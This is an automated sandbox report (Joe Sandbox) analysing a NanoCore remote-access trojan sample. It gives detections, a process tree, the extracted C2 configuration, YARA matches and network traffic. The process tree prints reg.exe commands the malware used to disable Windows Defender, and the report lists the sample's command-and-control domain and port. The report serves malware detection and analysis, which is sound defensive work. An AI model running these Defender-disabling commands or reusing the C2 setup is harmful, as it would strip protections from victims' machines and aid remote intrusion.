Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 01d32b29_by_Libranalysis

Overview

General Information

Sample Name:01d32b29_by_Libranalysis (renamed file extension from none to exe)
Analysis ID:412429
MD5:01d32b29cf20b16e7dc745f01168bdd5
SHA1:2603699a808a1ac0a2af21c6496acab3be0aa7c9
SHA256:e94c70d3dc3ab2496465e73bffc7c5f1bc3963f3ae309a88d5e16d5e54a540ce
Tags:NanoCore
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

Startup

  • System is w10x64
  • 01d32b29_by_Libranalysis.exe (PID: 6424 cmdline: 'C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe' MD5: 01D32B29CF20B16E7DC745F01168BDD5)
    • Main.exe (PID: 6492 cmdline: 'C:\Users\user\Desktop\Main.exe' MD5: 443089CA423FC51A74E6F64B4A910E04)
      • cmd.exe (PID: 6552 cmdline: 'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.bat C:\Users\user\Desktop\Main.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6620 cmdline: Reg.exe query 'HKU\S-1-5-19\Environment' MD5: E3DACF0B31841FA02064B4457D44B357)
        • reg.exe (PID: 6732 cmdline: Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)
        • reg.exe (PID: 6792 cmdline: Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableBehaviorMonitoring' /t REG_DWORD /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)
        • reg.exe (PID: 6840 cmdline: Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableOnAccessProtection' /t REG_DWORD /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)
        • reg.exe (PID: 6920 cmdline: Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableScanOnRealtimeEnable' /t REG_DWORD /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)
        • reg.exe (PID: 6956 cmdline: Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)
          • conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6992 cmdline: Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableRoutinelyTakingAction' /t REG_DWORD /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)
    • Service.exe (PID: 6520 cmdline: 'C:\Users\user\Desktop\Service.exe' MD5: A54512682E96BF7475C189E0D85C4B1F)
  • dhcpmon.exe (PID: 7056 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: A54512682E96BF7475C189E0D85C4B1F)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "f0ee6c15-7813-4f2f-a8f4-f86f2a48", "Group": "Default", "Domain1": "likedoingthis.ddns.net", "Domain2": "", "Port": 1337, "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\Service.exeNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
C:\Users\user\Desktop\Service.exeNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xff05:$x1: NanoCore Client.exe
  • 0x1018d:$x2: NanoCore.ClientPluginHost
  • 0x117c6:$s1: PluginCommand
  • 0x117ba:$s2: FileCommand
  • 0x1266b:$s3: PipeExists
  • 0x18422:$s4: PipeCreated
  • 0x101b7:$s5: IClientLoggingHost
C:\Users\user\Desktop\Service.exeJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    C:\Users\user\Desktop\Service.exeNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xfef5:$a: NanoCore
    • 0xff05:$a: NanoCore
    • 0x10139:$a: NanoCore
    • 0x1014d:$a: NanoCore
    • 0x1018d:$a: NanoCore
    • 0xff54:$b: ClientPlugin
    • 0x10156:$b: ClientPlugin
    • 0x10196:$b: ClientPlugin
    • 0x1007b:$c: ProjectData
    • 0x10a82:$d: DESCrypto
    • 0x1844e:$e: KeepAlive
    • 0x1643c:$g: LogClientMessage
    • 0x12637:$i: get_Connected
    • 0x10db8:$j: #=q
    • 0x10de8:$j: #=q
    • 0x10e04:$j: #=q
    • 0x10e34:$j: #=q
    • 0x10e50:$j: #=q
    • 0x10e6c:$j: #=q
    • 0x10e9c:$j: #=q
    • 0x10eb8:$j: #=q
    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    Click to see the 3 entries

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0x49395:$a: NanoCore
      • 0x493ee:$a: NanoCore
      • 0x4942b:$a: NanoCore
      • 0x494a4:$a: NanoCore
      • 0x5cb4f:$a: NanoCore
      • 0x5cb64:$a: NanoCore
      • 0x5cb99:$a: NanoCore
      • 0x755fb:$a: NanoCore
      • 0x75610:$a: NanoCore
      • 0x75645:$a: NanoCore
      • 0x493f7:$b: ClientPlugin
      • 0x49434:$b: ClientPlugin
      • 0x49d32:$b: ClientPlugin
      • 0x49d3f:$b: ClientPlugin
      • 0x5c90b:$b: ClientPlugin
      • 0x5c926:$b: ClientPlugin
      • 0x5c956:$b: ClientPlugin
      • 0x5cb6d:$b: ClientPlugin
      • 0x5cba2:$b: ClientPlugin
      • 0x753b7:$b: ClientPlugin
      • 0x753d2:$b: ClientPlugin
      00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xff8d:$x1: NanoCore.ClientPluginHost
      • 0xffca:$x2: IClientNetworkHost
      • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
        • 0xfcf5:$a: NanoCore
        • 0xfd05:$a: NanoCore
        • 0xff39:$a: NanoCore
        • 0xff4d:$a: NanoCore
        • 0xff8d:$a: NanoCore
        • 0xfd54:$b: ClientPlugin
        • 0xff56:$b: ClientPlugin
        • 0xff96:$b: ClientPlugin
        • 0xfe7b:$c: ProjectData
        • 0x10882:$d: DESCrypto
        • 0x1824e:$e: KeepAlive
        • 0x1623c:$g: LogClientMessage
        • 0x12437:$i: get_Connected
        • 0x10bb8:$j: #=q
        • 0x10be8:$j: #=q
        • 0x10c04:$j: #=q
        • 0x10c34:$j: #=q
        • 0x10c50:$j: #=q
        • 0x10c6c:$j: #=q
        • 0x10c9c:$j: #=q
        • 0x10cb8:$j: #=q
        Click to see the 24 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.Service.exe.5310000.6.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0xe75:$x1: NanoCore.ClientPluginHost
        • 0xe8f:$x2: IClientNetworkHost
        2.2.Service.exe.5310000.6.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
        • 0xe75:$x2: NanoCore.ClientPluginHost
        • 0x1261:$s3: PipeExists
        • 0x1136:$s4: PipeCreated
        • 0xeb0:$s5: IClientLoggingHost
        2.2.Service.exe.41d2a15.5.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0xb184:$x1: NanoCore.ClientPluginHost
        • 0x23c30:$x1: NanoCore.ClientPluginHost
        • 0xb1b1:$x2: IClientNetworkHost
        • 0x23c5d:$x2: IClientNetworkHost
        2.2.Service.exe.41d2a15.5.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
        • 0xb184:$x2: NanoCore.ClientPluginHost
        • 0x23c30:$x2: NanoCore.ClientPluginHost
        • 0xc25f:$s4: PipeCreated
        • 0x24d0b:$s4: PipeCreated
        • 0xb19e:$s5: IClientLoggingHost
        • 0x23c4a:$s5: IClientLoggingHost
        2.2.Service.exe.41d2a15.5.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
          Click to see the 52 entries

          Sigma Overview

          AV Detection:

          barindex
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Service.exe, ProcessId: 6520, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

          E-Banking Fraud:

          barindex
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Service.exe, ProcessId: 6520, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

          Stealing of Sensitive Information:

          barindex
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Service.exe, ProcessId: 6520, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

          Remote Access Functionality:

          barindex
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Service.exe, ProcessId: 6520, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for dropped fileShow sources
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen7
          Source: C:\Users\user\Desktop\Service.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen7
          Found malware configurationShow sources
          Source: 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "f0ee6c15-7813-4f2f-a8f4-f86f2a48", "Group": "Default", "Domain1": "likedoingthis.ddns.net", "Domain2": "", "Port": 1337, "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeVirustotal: Detection: 79%Perma Link
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeReversingLabs: Detection: 97%
          Source: C:\Users\user\Desktop\Main.exeReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\Service.exeReversingLabs: Detection: 97%
          Multi AV Scanner detection for submitted fileShow sources
          Source: 01d32b29_by_Libranalysis.exeVirustotal: Detection: 48%Perma Link
          Source: 01d32b29_by_Libranalysis.exeReversingLabs: Detection: 55%
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.603266642.00000000041BA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.377356574.0000000003421000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Service.exe PID: 6520, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 7056, type: MEMORY
          Source: Yara matchFile source: C:\Users\user\Desktop\Service.exe, type: DROPPED
          Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
          Source: Yara matchFile source: 2.2.Service.exe.41d2a15.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.0.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.5844629.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.41ce3ec.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Service.exe.900000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.41ce3ec.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.4472a15.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.5840000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.44695b6.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.446e3ec.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.5840000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.41c95b6.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.900000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.446e3ec.5.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Service.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: 01d32b29_by_Libranalysis.exeJoe Sandbox ML: detected
          Source: 16.0.dhcpmon.exe.c60000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: 2.0.Service.exe.900000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: 16.2.dhcpmon.exe.c60000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: 2.2.Service.exe.900000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: 2.2.Service.exe.5840000.9.unpackAvira: Label: TR/NanoCore.fadte
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: C:\Users\user\Desktop\Service.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 01d32b29_by_Libranalysis.exe
          Source: Binary string: C:\Windows\mscorlib.pdb source: Service.exe, 00000002.00000002.599360238.0000000002E36000.00000004.00000040.sdmp
          Source: Binary string: lib.pdb source: Service.exe, 00000002.00000002.599360238.0000000002E36000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Service.exe, 00000002.00000002.599360238.0000000002E36000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Service.exe, 00000002.00000002.599360238.0000000002E36000.00000004.00000040.sdmp
          Source: Binary string: mscorrc.pdb source: Service.exe, 00000002.00000002.604812875.00000000055A0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0131A717 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0132BA20 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0133AC28 FindFirstFileExA,
          Source: C:\Users\user\Desktop\Main.exeFile opened: C:\Users\user\AppData\Local\Temp\DFA1.tmp
          Source: C:\Users\user\Desktop\Main.exeFile opened: C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp
          Source: C:\Users\user\Desktop\Main.exeFile opened: C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.tmp
          Source: C:\Users\user\Desktop\Main.exeFile opened: C:\Users\user\AppData\Local\
          Source: C:\Users\user\Desktop\Main.exeFile opened: C:\Users\user\
          Source: C:\Users\user\Desktop\Main.exeFile opened: C:\Users\user\AppData\

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs:
          Source: Malware configuration extractorURLs: likedoingthis.ddns.net
          Uses dynamic DNS servicesShow sources
          Source: unknownDNS query: name: likedoingthis.ddns.net
          Source: global trafficTCP traffic: 192.168.2.6:49708 -> 91.109.188.5:1337
          Source: Joe Sandbox ViewASN Name: IELOIELOMainNetworkFR IELOIELOMainNetworkFR
          Source: unknownDNS traffic detected: queries for: likedoingthis.ddns.net
          Source: Service.exe, 00000002.00000002.598615106.000000000102B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: Service.exe, 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

          E-Banking Fraud:

          barindex
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.603266642.00000000041BA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.377356574.0000000003421000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Service.exe PID: 6520, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 7056, type: MEMORY
          Source: Yara matchFile source: C:\Users\user\Desktop\Service.exe, type: DROPPED
          Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
          Source: Yara matchFile source: 2.2.Service.exe.41d2a15.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.0.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.5844629.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.41ce3ec.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Service.exe.900000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.41ce3ec.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.4472a15.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.5840000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.44695b6.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.446e3ec.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.5840000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.41c95b6.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.900000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.446e3ec.5.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000002.603266642.00000000041BA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000002.00000002.604469931.0000000005310000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000010.00000002.377356574.0000000003421000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: Process Memory Space: Service.exe PID: 6520, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: Process Memory Space: Service.exe PID: 6520, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: Process Memory Space: dhcpmon.exe PID: 7056, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: Process Memory Space: dhcpmon.exe PID: 7056, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: C:\Users\user\Desktop\Service.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: C:\Users\user\Desktop\Service.exe, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.Service.exe.5310000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.2.Service.exe.41d2a15.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.Service.exe.5844629.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.2.Service.exe.41ce3ec.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.0.Service.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.0.Service.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.Service.exe.41ce3ec.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
